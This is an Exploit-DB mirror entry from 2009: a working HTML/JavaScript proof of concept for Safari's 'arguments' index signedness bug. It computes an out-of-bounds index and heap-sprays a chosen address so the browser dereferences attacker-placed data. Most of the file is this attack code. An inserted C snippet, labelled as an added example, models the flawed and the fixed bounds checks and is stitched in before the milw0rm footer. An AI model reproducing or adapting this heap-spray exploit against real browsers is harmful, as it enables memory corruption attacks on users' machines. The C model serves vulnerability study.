exploit-db-mirror/exploits/multiple/dos/7673.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

<BODY>
<CODE id="sploit status"></CODE>
<CODE id="heapspray status"></CODE>
<SCRIPT>
// HeapSpray2 helper: obfuscated eval(unescape(...)) blob, mis-encoded and unreadable in this copy, omitted.
// The index for the "arguments" array in a JavaScript function in
// Safari suffers from a signedness issue that allows access to elements
// that are out of bounds. The index is cast to a signed value before it
// is compared to the length of the array to check if it is within the
// bounds. Integer values larger than 0x8000,0000 will be cast to a
// negative value and because they are always smaller than the length,
// they are treated as a valid index.
// The index into the arguments array ends up in instructions
// that multiply it by 4 to access data in an array of 32 bit values.
// There are no checks for overflows in this calculation. This allows us
// to cause it to access anything in memory:
// Pointer to object = base address + 4 * index
// The base address varies only slightly and is normally about
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
// predictable location using heap spraying, we can then calculate an
// index that will access this memory.
var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
var iTargetArea = 0x10000000;
// Be advised that heap spraying is "upside down" in Safari: strings
// are allocated at high addresses first and as the heap grows, the
// addresses go down. The heap will therefore grow in between a lot of
// DLLs which reside in this area of the address space as well.
// We'll need to find an area of memory to spray that is not likely to
// contain a DLL and easy to reach.
var iTargetAddress = 0x55555555;
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
// iIndex = (iTargetAddress - iBase) / 4
var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
// We need to trigger the signedness issue so the index must be larger
// than 0x8000,0000. Because of the integer overflow in the
// multiplication, we can safely add 0x4000,0000 as often as we want;
// the multiplication will remove it from the result.
while (iIndex < 0x80000000) iIndex += 0x40000000
document.getElementById("sploit status").innerHTML = (
"iBase + 4 * iIndex = " +
"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
);
// Set up heap spray
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
oHeapSpray.oOutputElement = document.getElementById("heapspray status")
// Spray heap asynchronously and call sploit when done.
oHeapSpray.spray(sploit)
function sploit(oHeapSpray) {
// This will cause an access violation using the value 0xDEADBEEF,
// which comes from the strings we sprayed the heap with.
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
arguments[iIndex];
}
function DWORD(iValue) {
return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
}
</SCRIPT>
</BODY>
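The signed-compare bug and the wrapping address arithmetic that the script comments describe, modelled in C as an added example (not Safari's source and not part of this exploit): the flawed check beside the unsigned check that would have rejected the index, driven by the page's own iBase and iTargetAddress values. The function names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the flawed bounds check: the 32-bit index is cast to signed before
 * the comparison, so any index >= 0x80000000 reads as negative and "passes".
 * Illustrative only; not Safari's actual source. */
bool vulnerable_index_ok(uint32_t index, uint32_t length) {
    return (int32_t)index < (int32_t)length;
}

/* Hardened check: compare as unsigned, so a "negative" index is just a large
 * value and is rejected like any other out-of-range index. */
bool fixed_index_ok(uint32_t index, uint32_t length) {
    return index < length;
}

/* Element address as the page describes it: base + 4 * index in 32-bit
 * arithmetic. Both the multiply and the add wrap silently. */
uint32_t element_address(uint32_t base, uint32_t index) {
    return base + 4u * index;
}

/* Mirrors the page's index construction: offset that wraps to the target,
 * divided by 4, then pushed above 0x80000000 in steps of 0x40000000
 * (4 * 0x40000000 == 0 mod 2^32, so the address does not change). */
uint32_t index_for_target(uint32_t base, uint32_t target) {
    uint32_t index = (target - base) / 4u;  /* unsigned subtraction wraps */
    while (index < 0x80000000u) index += 0x40000000u;
    return index;
}

int main(void) {
    uint32_t base = 0x7fe91e6cu;    /* iBase from the page */
    uint32_t target = 0x55555555u;  /* iTargetAddress from the page */
    uint32_t length = 1;            /* arguments.length of sploit() */
    uint32_t index = index_for_target(base, target);
    /* Integer division drops the low two bits of the offset, so the address
     * lands at 0x55555554, one byte below the requested target. */
    printf("index=0x%08x vulnerable_check=%d fixed_check=%d address=0x%08x\n",
           index, vulnerable_index_ok(index, length),
           fixed_index_ok(index, length), element_address(base, index));
    return 0;
}
```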
# milw0rm.com [2009-01-05]